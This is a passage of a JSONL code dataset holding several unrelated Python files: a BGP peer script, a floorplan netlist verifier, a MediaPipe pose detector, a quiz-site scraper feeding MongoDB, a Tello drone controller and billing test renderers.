None\n","repo_name":"physicsnerd/adnascii","sub_path":"ADNACII.py","file_name":"ADNACII.py","file_ext":"py","file_size_in_byte":5599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"38064993683","text":"#!/usr/bin/env python\nimport sys\nassert sys.version_info > (3,5)\n#from ipaddress import IPv4Address\nimport netifaces\n\nfrom sessionmanager import SessionManager\n\ndef get_local_ipv4_addresses():\n for interface in netifaces.interfaces():\n if netifaces.AF_INET in netifaces.ifaddresses(interface):\n for address_info in netifaces.ifaddresses(interface)[netifaces.AF_INET]:\n yield address_info['addr']\n\npeers = [\"192.168.122.1\",\"192.168.122.179\",\"192.168.122.113\"]\nlocal_addresses = list(get_local_ipv4_addresses())\n#print(local_addresses)\n#print(peers)\n_peers = []\nfor peer in peers:\n if peer not in local_addresses:\n print(\"using %s\" % peer)\n _peers.append(peer)\n\n# __peers = list(map(IPv4Address,_peers))\nsm = SessionManager(_peers)\n","repo_name":"hdb3/BGPspeaker","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17158262486","text":"# (c) Víctor Franco Sanchez 2022\n# For the FRAME Project.\n# Licensed under the MIT License (see https://github.com/jordicf/FRAME/blob/master/LICENSE.txt).\n\nfrom typing import Any\nfrom frame.die.die import Die\nfrom frame.netlist.netlist import Netlist, Module\nfrom argparse import ArgumentParser\n\n\ndef parse_options(prog: str | None = None, args: list[str] | None = None) -> dict[str, Any]:\n \"\"\"\n Parse the command-line arguments for the tool\n :param prog: tool name\n :param args: command-line arguments\n :return: a dictionary with the arguments\n \"\"\"\n parser = ArgumentParser(prog=prog, description=\"Verifies that the output netlist has the same relevant \"\n \"properties as the input netlist\", usage='%(prog)s [options]')\n parser.add_argument(\"ini_netlist\", type=str, help=\"Input netlist (.yaml)\")\n parser.add_argument(\"die\", type=str, help=\"Input die (.yaml)\")\n parser.add_argument(\"out_netlist\", type=str, help=\"Output netlist (.yaml)\")\n parser.add_argument(\"--epsilon\", type=float, dest='epsilon', default=1e-10,\n help=\"The maximum allowable error\")\n return vars(parser.parse_args(args))\n\n\ndef shape_check(m1: Module, m2: Module, epsilon: float):\n def get_hardness(m):\n t = \"soft\"\n if m.is_hard:\n t = \"hard\"\n if m.is_fixed:\n t = \"fixed\"\n return t\n t1 = get_hardness(m1)\n t2 = get_hardness(m2)\n if t1 != t2:\n print(\"Module\", m1.name, \"is\", t1, \"on the input, but\", t2, \"on the output\")\n return False\n if t1 == \"hard\" or t1 == \"fixed\":\n a1 = m1.rectangles[0]\n a2 = m2.rectangles[0]\n for i in range(0, len(m1.rectangles)):\n r1 = m1.rectangles[i]\n r2 = m2.rectangles[i]\n if abs((r1.center.x - a1.center.x) - (r2.center.x - a2.center.x)) > epsilon or \\\n abs((r1.center.y - a1.center.y) - (r2.center.y - a2.center.y)) > epsilon or \\\n abs(r1.shape.w - r2.shape.w) > epsilon or abs(r1.shape.h - r2.shape.h) > epsilon:\n print(\"Module\", m1.name, \"is hard, but does not keep the same shape\")\n return False\n return True\n if t1 == \"fixed\":\n p1 = m1.rectangles[0].center\n p2 = m2.rectangles[0].center\n if abs(p1.x - p2.x) > epsilon or abs(p1.y - p2.y) > epsilon:\n print(\"Module\", m1.name, \"is fixed, but its position changes\")\n return True\n return True\n\n\ndef area_check(m1: Module, m2: Module, epsilon: float):\n a1 = m1.area()\n a2 = m2.area()\n if abs(a1 - a2) > epsilon:\n print(\"Module\", m1.name, \"has different area on the input and on the output\")\n return False\n return True\n\n\ndef die_check(m: Module, die: Die, epsilon: float):\n ok = True\n for rect in m.rectangles:\n x1 = rect.center.x - rect.shape.w / 2\n x2 = rect.center.x + rect.shape.w / 2\n y1 = rect.center.y - rect.shape.h / 2\n y2 = rect.center.y + rect.shape.h / 2\n if max(x1, x2) > die.width + epsilon or \\\n min(x1, x2) < -epsilon or \\\n max(y1, y2) > die.height + epsilon or \\\n min(y1, y2) < -epsilon:\n print(\"Module\", m.name, \"falls outside of the die\")\n ok = False\n return ok\n\n\ndef rect_overlap(r1, r2, epsilon):\n x1 = r1.center.x - r1.shape.w / 2\n x1b = r1.center.x + r1.shape.w / 2\n y1 = r1.center.y - r1.shape.h / 2\n y1b = r1.center.y + r1.shape.h / 2\n x2 = r2.center.x - r2.shape.w / 2\n x2b = r2.center.x + r2.shape.w / 2\n y2 = r2.center.y - r2.shape.h / 2\n y2b = r2.center.y + r2.shape.h / 2\n left = x2b - epsilon < x1\n right = x1b - epsilon < x2\n bottom = y2b - epsilon < y1\n top = y1b - epsilon < y2\n return not top and not bottom and not left and not right\n\n\ndef overlap_check(m1: Module, m2: Module, epsilon: float):\n for r1 in m1.rectangles:\n for r2 in m2.rectangles:\n if rect_overlap(r1, r2, epsilon):\n print(\"Modules\", m1.name, \"and\", m2.name, \"intersect\")\n return False\n return True\n\n\ndef self_overlap_check(m: Module, epsilon: float):\n for r1 in m.rectangles:\n for r2 in m.rectangles:\n if r1 == r2:\n continue\n if rect_overlap(r1, r2, epsilon):\n print(\"Modules\", m.name, \"has self-intersecting rectangles\")\n return False\n return True\n\n\ndef main(prog: str | None = None, args: list[str] | None = None) -> int:\n \"\"\"\n Main function.\n \"\"\"\n options = parse_options(prog, args)\n ini_net = Netlist(options['ini_netlist'])\n out_net = Netlist(options['out_netlist'])\n epsilon = options['epsilon']\n die = Die(options['die'])\n\n o_names = set()\n mod_map = dict()\n\n ok = True\n\n for module in ini_net.modules:\n if module.name in mod_map:\n print(\"Module\", module.name, \"found twice on the input netlist\")\n ok = False\n continue\n mod_map[module.name] = module\n\n for module in out_net.modules:\n if module.name not in mod_map:\n print(\"Module\", module.name, \"is present on the output, but not on the input\")\n ok = False\n continue\n if module.name in o_names:\n print(\"Module\", module.name, \"found twice on the output netlist\")\n ok = False\n continue\n o_names.add(module.name)\n ok &= area_check(mod_map[module.name], module, epsilon)\n ok &= shape_check(mod_map[module.name], module, epsilon)\n ok &= die_check(module, die, epsilon)\n ok &= self_overlap_check(module, epsilon)\n for module2 in out_net.modules:\n if module == module2:\n continue\n ok &= overlap_check(module, module2, epsilon)\n\n for module in ini_net.modules:\n if module.name not in o_names:\n print(\"Module\", module.name, \"is present on the input, but not on the output\")\n ok = False\n\n if ok:\n print(\"No errors were found!\")\n else:\n print(\"Some errors were found\")\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jordicf/FRAME","sub_path":"tools/verifier/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"}
+{"seq_id":"22681900414","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\n\nmp_drawing = mp.solutions.drawing_utils\nmp_pose = mp.solutions.pose\n\n\ndef calculate_angle(a, b, c):\n a = np.array(a)\n b = np.array(b)\n c = np.array(c)\n\n radians = np.arctan2(c[1]-b[1], c[0]-b[0]) - np.arctan2(a[1]-b[1], a[0]-b[0])\n angle = np.abs(radians*180.0/np.pi)\n\n if angle > 180:\n angle = 360-angle\n print(angle)\n\n return angle\n\n\ncap = cv2.imread('img/l.jpg')\n# cap = cv2.imread('img/s.png')\n\nwith mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\n\n image = cv2.cvtColor(cap, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n results = pose.process(image)\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n try:\n landmarks = results.pose_landmarks.landmark\n left_hip = landmarks[mp_pose.PoseLandmark.LEFT_HIP.value].y\n left_shoulder = landmarks[mp_pose.PoseLandmark.LEFT_SHOULDER.value].y\n right_hip = landmarks[mp_pose.PoseLandmark.RIGHT_HIP.value].y\n right_shoulder = landmarks[mp_pose.PoseLandmark.RIGHT_SHOULDER.value].y\n\n print(left_hip, left_shoulder, right_hip, right_shoulder)\n\n image.flags.writeable = True\n\n print(left_hip - left_shoulder, right_hip - right_shoulder)\n\n if -0.01 <= left_hip - left_shoulder <= 0.01 or -0.01 <= right_hip - right_shoulder <= 0.01:\n cv2.putText(image, 'lying down', (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 0), cv2.LINE_4)\n\n except:\n pass\n\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(245, 117, 66), thickness=2, circle_radius=2),\n mp_drawing.DrawingSpec(color=(245, 66, 230), thickness=2, circle_radius=2))\n\n cv2.imshow('MediaPipe Pose', image)\n cv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","repo_name":"Channaris/pose_detect","sub_path":"pic_body.py","file_name":"pic_body.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23358698957","text":"from bs4 import BeautifulSoup\n### Read URL - HTTP\nimport urllib\n### Read URL - HTTPS\nfrom urllib.request import Request, urlopen\nimport pymongo\nimport re\n \n\n### Global variables\nno_content = ''\njson_names_qa = ['question', 'options', 'answer', 'answer_explanation']\njson_names_q_options = ['option_name', 'option_value']\n\n### Get Soup of given URL\ndef get_soup_for_http(url, is_https):\n try:\n if is_https:\n ### Read URL - HTTPS website\n hdr = {'User-Agent': 'Mozilla/5.0'}\n req = Request(url, headers = hdr)\n html = urlopen(req)\n # html = requests.get(url).text\n return BeautifulSoup(html, \"html.parser\")\n else:\n ### Read URL - HTTP website\n html = urllib.request.urlopen(url).read()\n return BeautifulSoup(html, \"html.parser\")\n except Exception as e:\n print(\"get_soup : \", e)\n return None\n\n### Get Soup of given path\ndef get_soup_from_path(file_path):\n try:\n ### Read from file\n # file_path = \"d:/Projects/NLP/ScrapContentFromWebsites/Data/Website.HTML\"\n with open(file_path, encoding = \"utf-8\") as f:\n html = f.read()\n return BeautifulSoup(html, 'html.parser')\n except Exception as e:\n print(\"get_soup : \", e)\n return None\n\n### Connect mongo db\ndef connect_mongo_db(port, client, db):\n try:\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[client]\n mycol = mydb[db]\n return mycol\n except Exception as e:\n print(\"connect_mongo_db : \", e)\n return None\n\n### Insert into db\ndef insert_into_db(db, json):\n try:\n port = 27017\n client = 'IndiaBix'\n mycol = connect_mongo_db(port, client, db)\n # print(json)\n result = mycol.insert_many(json)\n print(\"result.. \", result, '\\n')\n except Exception as e:\n print(\"insert_into_db : \", e)\n\n### Assign - empty json\ndef return_empty_json(json_names):\n try:\n json_qa = {}\n if len(json_names) > 0:\n for json_name in json_names:\n json_qa[json_name] = ''\n return json_qa\n else:\n return ''\n except Exception as e:\n print(\"assign_json_empty : \", e)\n return ''\n\n### Scrape - question\ndef scrape_question(html):\n try:\n return html.find('td', {'class': 'bix-td-qtxt'}).find('p').get_text().strip()\n except Exception as e:\n print(\"scrape_question : \", e)\n return ''\n\n### Scrape - question options\ndef scrape_question_options(html):\n try:\n options = []\n options_tag_table = html.find('table', {'class': 'bix-tbl-options'})\n options_tag_tr = options_tag_table.find_all('tr')\n for option_tag in options_tag_tr:\n if option_tag is not None:\n option_td = option_tag.findNext('td').extract()\n if option_td is not None:\n option_name = option_td.get_text().replace('.', '').strip()\n option_td = option_tag.findNext('td')\n if option_td is not None:\n option_value = option_td.get_text().strip()\n options.append({ 'option_name': option_name, 'option_value': option_value })\n return options\n except Exception as e:\n print(\"scrape_question_options : \", e)\n return return_empty_json(json_names_q_options)\n\n### Scrape - answer\ndef scrape_answer(html, options):\n try:\n q_answer_option_name = html.find('div', {'class': 'bix-div-answer mx-none'}).findNext('p').find_all('span')[1].get_text().strip()\n q_answer = {}\n for option in options:\n if option['option_name'] == q_answer_option_name:\n q_answer = {'option_name': option['option_name'], 'option_value': option['option_value']}\n break\n return q_answer\n except Exception as e:\n print(\"scrape_answer : \", e)\n return return_empty_json(json_names_q_options)\n\n### Scrape - answer explanation\ndef scrape_answer_explanation(html):\n try:\n return html.find('div', {'class': 'bix-ans-description'}).get_text().strip()\n except Exception as e:\n print(\"scrape_answer_explanation : \", e)\n return ''\n\n### Scrape - question, options and answer from container\ndef scrape_qa(table_qa):\n try:\n question = scrape_question(table_qa)\n options = scrape_question_options(table_qa)\n q_answer = scrape_answer(table_qa, options)\n answer_explanation = scrape_answer_explanation(table_qa)\n\n ### Define a json\n return { 'question': question, 'options': options, 'answer': q_answer, 'answer_explanation': answer_explanation }\n except Exception as e:\n print(\"scrape_qoae : \", e)\n return return_empty_json(json_names_qa)\n\n### Scrape - question, options, answer and answer explanation\ndef get_qa_from_container(soup):\n try:\n json_qa = []\n for table_qa in soup.find_all('table', {'class': 'bix-tbl-container'}):\n try:\n if table_qa is not None:\n json_qa.append(scrape_qa(table_qa))\n except Exception as e:\n print(\"table_qa : \", e)\n # print(json_qa, '\\n')\n return json_qa\n except Exception as e:\n print(\"get_qa_from_container : \", e)\n return []\n\n### Scrape - question, options, answer and answer explanation and insert into db\ndef scrape_insert_qa(primary_url, page_url, db):\n try:\n ### Get soup\n url = primary_url +'/'+ page_url\n soup = get_soup_for_http(url, True)\n ### Get qa\n json_qa = get_qa_from_container(soup)\n ### Insert into db\n if len(json_qa) > 0:\n insert_into_db(db, json_qa)\n\n condition = True\n while condition:\n page_container = soup.find('div', {'class', 'mx-pager-container'})\n if page_container is not None:\n current_span = page_container.find('span', {'class': 'mx-pager-current'})\n if current_span is not None:\n next_page = current_span.findNext('a')\n if next_page is not None:\n if next_page.findNext('span', {'class': 'mx-pager-no'}) is not None:\n next_page_url = next_page.get('href')\n ### Get soup\n url = primary_url +'/'+ next_page_url\n soup = get_soup_for_http(url, True)\n ### Get qa\n json_qa = get_qa_from_container(soup)\n ### Insert into db\n if len(json_qa) > 0:\n insert_into_db(db, json_qa)\n else:\n condition = False\n break\n else:\n condition = False\n break\n else:\n condition = False\n break\n else:\n condition = False\n break\n except Exception as e:\n print(\"scrape_insert_qa : \", e)\n return return_empty_json(json_names_qa)\n\n### Scrape - questions sections\ndef scrape_question_section(primary_url, qa_section, qa_tag):\n try:\n ### Get soup\n url = primary_url +'/'+ qa_section +'/'+ qa_tag\n soup = get_soup_for_http(url, False)\n topics_containers = soup.find_all('div', {'class': 'div-topics-index'})\n for topics_container in topics_containers:\n topics = topics_container.find_all('li')\n for topic in topics:\n if topic is not None:\n topic = topic.findNext('a')\n if topic is not None:\n topic = topic.get('href')\n if topic is not None:\n for topic_split in (topic_split for topic_split in topic.split('/') if topic_split is not ''):\n topic = topic_split\n topic = topic.replace('/', '')\n print('qa_section: '+ qa_section +' topic : '+ topic)\n page_url = qa_section +'/'+ topic\n db = qa_section.replace('-', '_') +'_'+ topic.replace('-', '_')\n # print(primary_url +'/'+ page_url, ' ', db)\n scrape_insert_qa(primary_url, page_url, db)\n\n except Exception as e:\n print(\"scrape_question_section : \", e)\n\n### Scrape - questions section list\ndef scrape_question_section_list(primary_url):\n try:\n qa_section = 'aptitude'\n qa_tag = 'questions-and-answers'\n ### Get soup\n soup = get_soup_for_http(primary_url, False)\n qa_section_containers = soup.find_all('ul', {'class': 'ques-ans'})\n for qa_section_container in qa_section_containers:\n qa_sections = qa_section_container.find_all('li')\n for qa_section in qa_sections:\n if qa_section is not None:\n qa_section = qa_section.findNext('a')\n if qa_section is not None:\n qa_section = qa_section.get('href')\n if qa_section is not None:\n if qa_tag in qa_section:\n for qa_section_split in (qa_section_split for qa_section_split in qa_section.split('/') if qa_section_split is not ''):\n topic = qa_section_split\n qa_section = qa_section.replace(qa_tag, '').replace('/', '')\n scrape_question_section(primary_url, qa_section, qa_tag)\n\n except Exception as e:\n print(\"scrape_question_section_list : \", e)\n\n### define a main funtion\ndef main():\n try:\n primary_url = 'https://www.indiabix.com'\n \n scrape_question_section_list(primary_url)\n except Exception as e:\n print(\"main : \", e)\n\n### Call main\nmain()","repo_name":"manoj-vkumar/Scrape_IndiaBix_QA","sub_path":"Code/QA_From_IndiaBix.py","file_name":"QA_From_IndiaBix.py","file_ext":"py","file_size_in_byte":10143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"6295862341","text":"from djitellopy import Tello\nimport cv2\nimport time\nfrom os import environ\nimport os.path\nimport uuid\nfrom datetime import datetime\nfrom pathlib import Path\nfrom threading import Thread\nimport time, threading\n\n# pictures_folder = os.path.join(environ[\"USERPROFILE\"], \"Pictures\", \"tello\")\ndesktop = os.path.expanduser(\"~/Desktop\")\n# get the current date time\ncurrent_dateTime = datetime.now()\nfilepath = Path(f\"{desktop}/leaf Disease Detection/predictions/pictures\")\nfilepath.parent.mkdir(parents=True, exist_ok=True)\npictures_folder = f\"{desktop}/leaf Disease Detection/predictions/pictures\"\n# Speed of the drone\nS = 60\n\n# Frames per second of the pygame window display\n# A low number also results in input lag, as input information is processed once per frame.\nFPS = 180\n\n\nclass Aircraft(object):\n def __init__(self):\n # Init Tello object that interacts with the Tello drone\n self.tello = Tello()\n\n # Drone velocities between -100~100\n self.back_velocity = 0\n self.left_right_velocity = 0\n self.up_down_velocity = 0\n self.yaw_velocity = 0\n self.speed = 10\n self.has_takeoff = False\n\n self.send_rc_control = False\n\n self.is_connected = False\n self.is_streaming_video = False\n self.keepRecording = True\n\n self.frame_read = None\n\n # we need to run the recorder in a seperate thread, otherwise blocking options\n # would prevent frames from getting added to the video\n self.recorder = Thread(\n target=self.videoRecorder, args=lambda: self.keepRecording\n )\n\n def connect(self):\n \"\"\"\n Connect to the drone and activate parameters for streaming\n \"\"\"\n self.tello.connect()\n self.tello.set_speed(self.speed)\n\n # In case streaming is on. This happens when we quit this program abruptly.\n self.tello.streamoff()\n self.tello.streamon()\n\n self.frame_read = self.tello.get_frame_read()\n\n self.is_connected = True\n\n def initite_land(self):\n \"\"\"\n Land the aircraft\n \"\"\"\n if self.is_connected and self.has_takeoff:\n not self.tello.land() # land\n self.send_rc_control = False\n self.has_takeoff = False\n\n def initite_takeoff(self):\n \"\"\"\n Attempts to put the aircraft in motion by taking off. If the operation fails, retries\n for 10 times, if the operation fails then quits.\n \"\"\"\n retry_times = 0\n while self.is_connected and retry_times < 10 and not self.has_takeoff:\n try:\n self.tello.takeoff() # takeoff\n self.send_rc_control = True\n self.has_takeoff = True # make sure the aircraft has taken off before attempting to control it\n return True\n except:\n print(\"Error occurrd taking off. Retrying...\")\n\n if self.has_takeoff:\n return True\n\n self.tello.send_keepalive()\n\n # if the aircraft retries takeoff for 10 times without any success, quit taking\n # off. Maybe the aircraft became unavailable or is busy\n if retry_times == 10 and not self.has_takeoff:\n print(\"aircraft attempted takeoff 10 times without success. Quitting...\")\n return False\n\n def move(self, forward_back=0, left_right=0, up_down=0, yaw=0):\n \"\"\"\n Updates the aircraft motion according to the velocities passed to it\n \"\"\"\n\n self.back_velocity = forward_back\n self.left_right_velocity = left_right\n self.up_down_velocity = up_down\n self.yaw_velocity = yaw\n\n if self.is_connected and self.send_rc_control:\n self.tello.send_rc_control(left_right, forward_back, up_down, yaw)\n\n def update(self):\n \"\"\"\n Update routine. Send velocities to Tello.\n \"\"\"\n if self.is_connected and self.send_rc_control:\n self.tello.send_rc_control(\n self.left_right_velocity,\n self.back_velocity,\n self.up_down_velocity,\n self.yaw_velocity,\n )\n\n def capture_image(self):\n \"\"\"\n Captures an image and save it in the Pictures folder\n \"\"\"\n\n # create directory if it does not exist\n if not os.path.exists(pictures_folder):\n os.mkdir(pictures_folder)\n\n if self.is_connected:\n cv2.imwrite(\n f\"{pictures_folder}/{uuid.uuid4().hex}.png\", self.frame_read.frame\n )\n\n def stream_video(self):\n \"\"\"\n Streams a video and save it in the Pictures folder\n \"\"\"\n\n # create directory if it does not exist\n if not os.path.exists(pictures_folder):\n os.mkdir(pictures_folder)\n\n if self.is_connected:\n if not self.is_streaming_video:\n self.keepRecording = True\n self.recorder.start()\n else:\n self.is_streaming_video = False\n self.keepRecording = False\n self.recorder._stop_event.set()\n self.recorder.join()\n\n def get_frame(self):\n # self.send_keepalive()\n \"\"\"Returns the frame handle used to capture images from the vehicle\"\"\"\n if self.frame_read:\n return self.frame_read\n else:\n return None\n\n def get_battery(self):\n \"\"\"Returns the battery level of the aircraft\"\"\"\n if self.is_connected:\n return self.tello.get_battery()\n else:\n return 0\n\n def get_status(self):\n try:\n status = self.tello.get_battery()\n print(f\"this is the status of the drone {status}\")\n except:\n print(\"Could not get drone status cause it is not connected\")\n\n def get_altitude(self):\n \"\"\"Returns the current altitude of the aircraft\"\"\"\n if self.is_connected:\n return self.tello.get_height()\n else:\n return 0\n\n def videoRecorder(self, keepRecording):\n if self.is_connected:\n # create a VideoWrite object, recoring to ./guid.avi\n height, width, _ = self.frame_read.frame.shape\n # video = cv2.VideoWriter(f\"{pictures_folder}/{uuid.uuid4().hex}.avi\", cv2.VideoWriter_fourcc(*'XVID'), 30, (width, height))\n video = cv2.VideoWriter(\n f\"{pictures_folder}/{uuid.uuid4().hex}.mp4\",\n cv2.VideoWriter_fourcc(*\"MP4V\"),\n 30,\n (width, height),\n )\n\n while keepRecording:\n video.write(self.frame_read.frame)\n time.sleep(1 / 30)\n\n video.release()\n\n def get_state(self, key):\n return self.tello.get_state_field(key)\n","repo_name":"synper-ce/drone-project","sub_path":"viewmodels/aircraft.py","file_name":"aircraft.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43797902763","text":"# 2846 오르막길\n\nN = int(input())\np = list(map(int, input().split()))\nstep = 0 # 높이 차이\nresult = 0 # 높이 중에 큰 값\nfor data in range(N-1):\n # 오르막이면\n if p[data+1] > p[data]:\n step += p[data+1] - p[data] # 높이 차이 저장\n else: # 내리막이거나 같은 높이라면 step 초기화\n step = 0\n result = max(result, step) # 기존 높이와 현재 높이 중 큰 값\nprint(result)","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week02_230119/2846_오르막길/2846_정광배.py","file_name":"2846_정광배.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"29058889737","text":"import typing as tp\nfrom abc import ABC, abstractmethod\nfrom os import path\n\nfrom billing.hot.tests.lib.date import formatted\nfrom billing.hot.tests.lib.rand import rand\nfrom billing.hot.tests.lib.templates import loader\nfrom billing.hot.tests.lib.util.util import deep_update\nfrom billing.hot.tests.lib.state import contract as contr\n\nif tp.TYPE_CHECKING:\n from billing.hot.tests.lib.state import state\n\n\nclass ProcessorLoader:\n def __init__(self, template_dir: str) -> None:\n self.loader = loader.TemplateLoader(template_dir)\n\n def load_actotron_act_rows_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('actotron_act_rows', name))\n\n def load_taxi_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('taxi', name))\n\n def load_oplata_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('oplata', name))\n\n def load_bnpl_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('bnpl', name))\n\n def load_bnpl_income_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('bnpl_income', name))\n\n def load_taxi_light_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('taxi_light', name))\n\n def load_trust_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('trust', name))\n\n def load_request(self, folder: str, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join(folder, name))\n\n\nclass ProcessorActotronActRowsRendererMixin:\n @staticmethod\n def render_acts_request(\n st: 'state.PipelineState',\n contract_type: type,\n request: dict,\n namespace: str,\n act_sum_positive: float,\n act_sum_negative: float,\n act_sum_wo_vat_positive: float,\n act_sum_wo_vat_negative: float,\n ) -> loader.RenderedTemplate:\n request['namespace'] = namespace\n\n act_row_id = rand.hex(16)\n st.add_transactions([act_row_id])\n\n event: dict[str, tp.Any] = request['event']['obj']\n event.update({\n 'act_row_id': act_row_id,\n 'client_id': st.client_id,\n 'act_sum': act_sum_positive + act_sum_negative,\n 'contract_id': st.get_contract(contract_type).id,\n 'act_start_dt': formatted.shifted_date_iso(hours=-4),\n 'act_finish_dt': formatted.shifted_date_iso(hours=-3),\n })\n sum_components: dict[str, tp.Any] = event['act_sum_components']\n sum_components.update({\n 'act_sum_positive': act_sum_positive,\n 'act_sum_negative': act_sum_negative,\n 'act_sum_wo_vat_positive': act_sum_wo_vat_positive,\n 'act_sum_wo_vat_negative': act_sum_wo_vat_negative,\n })\n\n return request\n\n\nclass BaseProcessorRenderer(ABC):\n def __init__(self, lder: ProcessorLoader) -> None:\n self.loader = lder\n\n @abstractmethod\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n raise NotImplementedError\n\n @staticmethod\n def _render_payout_request(\n st: 'state.PipelineState',\n request: loader.RenderedTemplate,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n event = request['event']\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"client_id\": st.client_id,\n \"event_time\": formatted.date_iso(),\n \"transaction_id\": str(t_id),\n })\n if extended_params:\n event.update(extended_params)\n return request\n\n\nclass ProcessorBnplRenderer(BaseProcessorRenderer, ProcessorActotronActRowsRendererMixin):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n event = sender_state.event_params or {}\n if sender_state.endpoint == 'cashless':\n return self.render_cashless_request(\n sender_state=sender_state,\n contract_type=contr.BnplContract,\n request=sender_state.template,\n transaction_amount=event.get('transaction_amount'),\n total_commission=event.get('total_commission'),\n )\n if sender_state.endpoint == 'payout':\n return self.render_payout_request(\n st=sender_state,\n request=self.loader.load_bnpl_request(sender_state.template),\n extended_params=event\n )\n if sender_state.endpoint == 'acts':\n return self.render_acts_request(\n st=sender_state,\n contract_type=contr.BnplContract,\n request=self.loader.load_actotron_act_rows_request(name=sender_state.template),\n namespace=sender_state.namespace,\n act_sum_positive=event.get('act_sum_positive', 0),\n act_sum_negative=event.get('act_sum_negative', 0),\n act_sum_wo_vat_positive=event.get('act_sum_wo_vat_positive', 0),\n act_sum_wo_vat_negative=event.get('act_sum_wo_vat_negative', 0)\n )\n\n raise LookupError(f'unknown endpoint for ProcessorBnplRenderer: {sender_state.endpoint}')\n\n def render_payout_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: tp.Optional[dict] = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_bnpl_request(request)\n return self._render_payout_request(st, request, extended_params)\n\n def render_cashless_request(\n self,\n sender_state: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath,\n transaction_amount: tp.Optional[float] = None,\n total_commission: tp.Optional[float] = None,\n ):\n if isinstance(request, str):\n request = self.loader.load_bnpl_request(request)\n event: dict[str, tp.Any] = request['event']\n\n self._update_event(sender_state, event, contract_type)\n\n if transaction_amount:\n event['transaction_amount'] = transaction_amount\n\n if total_commission:\n event['aquiring_commission'] = total_commission // 2\n event['service_commission'] = total_commission - event['aquiring_commission']\n\n return request\n\n @staticmethod\n def _update_event(\n sender_state: 'state.PipelineState',\n event: dict[str, tp.Any],\n contract_type: type,\n ) -> None:\n event.update({\n 'billing_client_id': sender_state.client_id,\n 'billing_contract_id': sender_state.get_contract(contract_type).id,\n 'order_creation_dt': formatted.shifted_date_iso(hours=-4),\n 'transaction_dt': formatted.shifted_date_iso(hours=-3),\n 'transaction_id': f'transaction_id-{sender_state.order_uid}-{event[\"transaction_type\"]}',\n })\n\n\nclass ProcessorBnplIncomeRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n event = sender_state.event_params or {}\n if sender_state.endpoint == 'commission':\n return self.render_commission_request(\n st=sender_state,\n contract_type=contr.BnplIncomeContract,\n request=sender_state.template,\n transaction_type=event.get('transaction_type', 'payment'),\n transaction_amount=event.get('transaction_amount')\n )\n raise LookupError(f'unknown endpoint for ProcessorBnplIncomeRenderer: {sender_state.endpoint}')\n\n def render_commission_request(\n self,\n st: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath = 'commission.json',\n transaction_type: str = 'payment',\n transaction_amount: tp.Optional[float] = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_bnpl_income_request(request)\n event: dict[str, tp.Any] = request['event']\n\n self._update_event(st, event, contract_type)\n\n event['transaction_type'] = transaction_type\n\n if transaction_amount:\n event['transaction_amount'] = transaction_amount\n\n return request\n\n @staticmethod\n def _update_event(\n sender_state: 'state.PipelineState',\n event: dict[str, tp.Any],\n contract_type: type,\n ) -> None:\n event.update({\n 'billing_client_id': sender_state.client_id,\n 'billing_contract_id': sender_state.get_contract(contract_type).id,\n 'transaction_dt': formatted.shifted_date_iso(hours=-3),\n 'transaction_id': f'transaction_id-{sender_state.order_uid}-{event[\"transaction_type\"]}',\n })\n\n\nclass ProcessorTaxiLightRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n event = sender_state.event_params or {}\n if sender_state.endpoint == 'payout':\n return self.render_payout_request(\n st=sender_state,\n request=sender_state.template,\n operation_type=event.get('operation_type', 'INSERT_NETTING'),\n amount=event.get('amount')\n )\n raise LookupError(f'unknown endpoint for ProcessorTaxiLightRenderer: {sender_state.endpoint}')\n\n def render_payout_request(\n self,\n st: 'state.PipelineState',\n request: 